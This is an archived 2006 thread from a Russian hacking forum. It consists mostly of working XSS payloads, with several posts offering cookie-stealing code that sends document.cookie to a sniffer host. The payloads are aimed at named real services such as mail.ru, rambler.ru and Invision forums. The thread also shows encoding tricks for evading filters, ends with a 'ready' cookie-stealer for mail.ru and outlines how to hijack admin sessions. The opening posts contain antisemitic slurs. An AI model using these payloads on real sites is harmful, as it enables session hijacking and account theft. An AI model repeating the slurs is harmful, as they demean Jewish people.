HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > ИНФО > Статьи > Авторские статьи
   
 
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 12.03.2006, 23:10
ZaCo
Banned
Регистрация: 20.06.2005
Сообщений: 880
Провел на форуме:
4610226

Репутация: 1332


По умолчанию

ты че еврей вопросом на вопросм отвечать? белый жид ахтунг!
 

  #2  
Старый 12.03.2006, 23:11
Arakyla
Banned
Регистрация: 12.03.2006
Сообщений: 4
Провел на форуме:
9724

Репутация: -6
По умолчанию

Цитата:
Сообщение от ZaCo  
ты че еврей вопросом на вопросм отвечать? белый жид ахтунг!
Кстати да!!!!


Надо было просто ответить вот в такой форме...

Цитата:
Сообщение от ZaCo  
ты че еврей вопросом на вопросм отвечать?

Ррррразве?

Последний раз редактировалось Arakyla; 12.03.2006 в 23:25..
 

  #3  
Старый 16.12.2005, 13:15
NIGHT_WOLF
Участник форума
Регистрация: 17.08.2005
Сообщений: 237
Провел на форуме:
1575267

Репутация: 27
Отправить сообщение для NIGHT_WOLF с помощью ICQ
По умолчанию

Как всегда гениально, но уж сильно много =)
Сохранил буду понемногу разбираться...
 

  #4  
Старый 31.01.2006, 23:36
President Bush
Banned
Регистрация: 31.01.2006
Сообщений: 3
Провел на форуме:
5385

Репутация: 0
По умолчанию

Код HTML:
[quote][color=white][email]wj@wj[url=style=display:none&#x3B;background:url(javascript:document.images[1].src="http://antichat.org/s/antichat.gif?"+document.cookie)&#x3B;][/url].com[/email][/color][/quote]
Код HTML:
[url=http://www.wj.com wj[url=http://www.wj.com style=display:none;background:url('javascript:alert("wj")')  wj]][/url][/url]
Код HTML:
[url=http:// wj[url= style=background:url(javascript:for(;;)open())  wj]][/url][/url]
Код HTML:
[url=http://www.wj.com wj[url=http://www.wj.com style=display:none;background:url('javascript:img=new/**/Image();img.src="http://antichat.org/s/login.gif?"+document.cookie;')  wj]][/url][/url]
Код HTML:
<script>img=new Image();img.src="http://antichat.org/s/login.gif?"+document.cookie;</script>
Вот такие тоже бывают примеры вот.


Это все полезно для новичков чтобы знали как это все выглядит.


Мы старые, должны новичком помогать и их обучать вот.

Последний раз редактировалось President Bush; 31.01.2006 в 23:51..
 

  #5  
Старый 03.03.2006, 20:08
Technic
Banned
Регистрация: 26.02.2006
Сообщений: 5
Провел на форуме:
21186

Репутация: -4
По умолчанию

Код HTML:
<img src=http://www.xss.gif s='"p">'onerror=alert(/wj/) style=visibility:hidden>
Вот так ломается mail.ru, inbox.ru, bk.ru, list.ru, rambler.ru, и другие, а главное, что работает проверенно в Опере, Фаерфокс и ИЕ. (Сейчас четвертое Марта, 2006 год)

А вот так ломается инвизион 2.*

Код HTML:
[img]/[snapback]	onerror=alert(/wj/)	[/snapback].gif[/img]
Где Я поставил табуляции вместо пробелов.

И обратите внимание, что элемент img, не терпит в своем параметре какого либо пробела чтобы сработала функция onerror! Это можно ТОЛЬКО обойти посредством слеша (/) или точкой с запитой. (;)

То есть вот так вот,
Цитата:
<img src="http://www.wj.gif<a href=" onerror=alert('wj') style="display:none;">
Именно из-за пробела в атрибуте src элемента img, в браузере фаерфокс скрипт не сработает! Но за-то вот так вот - сработает.

Код HTML:
<img src="http://www.wj.gif/<a href=" onerror=alert('wj') style="display:none;">
Или,

Код HTML:
<img src="http://www.wj.gif;<a href=" onerror=alert('wj') style="display:none;">
И еще, если этот же код написать в Опере, то работать не будет из-за style="display:none;" но это не беда, ибо можно просто написать вот так вот и все везде будет работать, будучи не видимо для пытливых глаз:

Код HTML:
<img src="http://www.wj.gif;<a href=" onerror=alert('wj') style="visibility:hidden">
Воруем куки...

Код HTML:
<img src=javascript:i=new/**/Image();i.src='http://antichat.ru/cgi-bin/s.jpg?'+document.cookie;>


И еще, иногда обойти фильтры посредством HTML объектов не удается, (&#x77;) тогда приходится прибегать к урл кодировки о которой Я еще не нашел, чтобы кто нибудь знал.

Код HTML:
<img src="javascript:alert('wj')">
Кодируем в урл кодировку,

Код HTML:
<img src="javascript:%61%6C%65%72%74%28%27%77%6A%27%29">
Честно говорю, что очень мало кто знает об этом способе.... Ну и надо еще знать, что закодировать в урл кодировку можно только после протокола JavaScript и т.д.

Иногда приходится угнать куки при помощи vbscript, а как это делается? vbscript как Я теперь узнал, не поддерживает способы вызывать браузерам картинки так, как это в состоянии делать JavaScript, (По крайней мере Я таких примеров не встречал и не нашел) но это не беда, поскольку мы можем обходить эту дилемму посредством перехождения с одного протокола на другой.

Код HTML:
<img src=vbscript:window.execScript("img=new/**/Image();img.src='http://antichat.ru/cgi-bin/s.jpg?'+document.cookie;")>

И опять таки, иногда провести onerror() можно, а все параметры как нам на зло фильтруются и идет жуткая фильтрация на HTML объекты и на прочею дребедень. Ну тогда можно прибегнуть к нашему любимому String.fromCharCode()

<!-- Это нельзя писать произвольно, то большими буквами, то маленькими, то есть вот так, String.FromCharCode() работать у вас не будет. -->

И так, используем уже готовую ссылку,

http://ferruh.mavituna.com/stringfromcharcode.asp?

И кодируем следующую строку.

Код HTML:
document.images[1].src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;
Которая есть ни что иное как код сниффера, который работает к примеру вот так, в таком виде:

Код HTML:
<img src="http://www.badimage.gif" onerror='document.images[0].src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;'>
И получаем следующие:

Char :
Цитата:
document.images[0].src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;
Ascii :
Цитата:
100,111,99,117,109,101,110,116,46,105,109,97,103,1 01,115,91,48,93,46,115,114,99,61,34,104,116,116,11 2,58,47,47,97,110,116,105,99,104,97,116,46,114,117 ,47,99,103,105,45,98,105,110,47,115,46,106,112,103 ,63,34,43,100,111,99,117,109,101,110,116,46,99,111 ,111,107,105,101,59
JS Code :
Код HTML:
String.fromCharCode(100,111,99,117,109,101,110,116,46,105,109,97,103,101,115,91,48,93,46,115,114,99,61,34,104,116,116,112,58,47,47,97,110,116,105,99,104,97,116,46,114,117,47,99,103,105,45,98,105,110,47,115,46,106,112,103,63,34,43,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,59);
Ну а теперь применяем наш закодированный вариант, в совокупности функцией eval()

Код HTML:
<img src="http://www.badimage.gif" onerror=eval(String.fromCharCode(100,111,99,117,109,101,110,116,46,105,109,97,103,101,115,91,48,93,46,115,114,99,61,34,104,116,116,112,58,47,47,97,110,116,105,99,104,97,116,46,114,117,47,99,103,105,45,98,105,110,47,115,46,106,112,103,63,34,43,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,59));>
Смотрим лог сниффера, http://www.antichat.ru/sniff/log.php

Если кто нибудь хочет узнать как создавать липовые страницы, то вот Я описал этот метод на этой ссылки.

http://video.antichat.net/file181.html


White Jordan.

Администрация несет полную ответственность за ваши взломы.
 

  #6  
Старый 03.03.2006, 20:46
Technic
Banned
Регистрация: 26.02.2006
Сообщений: 5
Провел на форуме:
21186

Репутация: -4
По умолчанию

Код HTML:
<img src=http://www.xss.gif s='"p">'onerror=i=new/**/Image();i.src='http://antichat.ru/cgi-bin/s.jpg?'+document.cookie; style=visibility:hidden>
Просто все хотели готовый код куки воровать на mail.ru так что вот вам. Резвитесь.



P.S.

Чтобы обезопасится от такой атаки, достаточно просто выключить загрузку картинок в своем браузере.

Но однако не совсем ок, ибо логически можно провести атаку метода Tarce, о котором Я как нить тоже напишу статью.

Method Trace

Метод Trace, это такой способ, который позволяет проводить атаку XSS вне зависимости где находится жертва. Как мы все знаем, куки не переходят от одной области в другую, то есть если Я сейчас создам страницу на narod.ru с кодом воровки кук, и тут на античатовском форуме пройдусь по этой ссылки залогинившися при этом в мой аккунт, то мои куки полетят на сниффер от НАРОДА а не от форума античата. С методом трейс однако, это легко обходится. Болие того, если картинки отключены, то тоже реально упереть куки если провести эту атаку, которую можно провести где угодно. Понимайте метод трейс, как метод атаки XSS на WWW в любом месте, в любое время.

Как узнать если этот метод поддерживается?


Очень просто, он всегда включен по умолчанию, но можно и проверить написав код или на Джаваскрипт, или же воспользоваться этой ссылкой.

http://web-sniffer.net/

Можно ли ломануть античатовский форум этим методом? Да! Реально ли? Да! Убийство ли это времени? О да! +)

Как? Да очень просто, совсем не обязательно просить или нудить кого нибудь посетить нашу ссылку которая будет воровать куки Админов а то и сессию админской панели, когда это можно сделать в любом месте и сделать чтобы скрипт срабатывал автоматически и без ведо админа, ну к примеру просто послав Админу или кому угодно на античате на мыло к примеру мейл.ру письмо, или туда где админ или наша жертва обитает будь то уязвимый форум, чат т.д. и вместо кода сниффера для мейл.ру, впаять код сниффера для античатовского форума. Так как ИП теперь у нас привязывается к сессии (Кстати это из-за меня +) ) и кук нам не совсем достаточно, то есть два пути:

1. Или уловить админа и своровать админ-панельские куки, которые можно тут же применить и выполнить с ними собственный скрипт сделав себя админом, или же, узнавать с помощью скрипта мыльники пользователей и их взламывать, что для меня очень легко делать через XSS. Потом можно сделать себе ретрив паролей. +)

Ну логически будет просто метод трейс отключить так? Ведь все что нужно, так это отключить на античате этот метод и усе.....


А ведь можно еще и заставить проксю, то есть прокси сервер которым античатовец пользуется, вернуть нам трейс информацию, то есть - его куки. +)

Короче вот интересная чтива.

http://www.cgisecurity.com/whitehat-...per_screen.pdf
http://www.modsecurity.org/archive/a...rikes_back.txt

Тут очень все ясно и понятно.

Последний раз редактировалось Technic; 03.03.2006 в 23:03..
 

  #7  
Старый 04.03.2006, 10:11
ilyha
Познающий
Регистрация: 10.11.2005
Сообщений: 75
Провел на форуме:
367531

Репутация: 4
Thumbs up

Вот Джордан передал чтиво:

http://www.r-i-p.info/artview.php?id=182

и еще кое что:

http://www.cyberinfo.ru/16/3181_1.htm

 
 





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ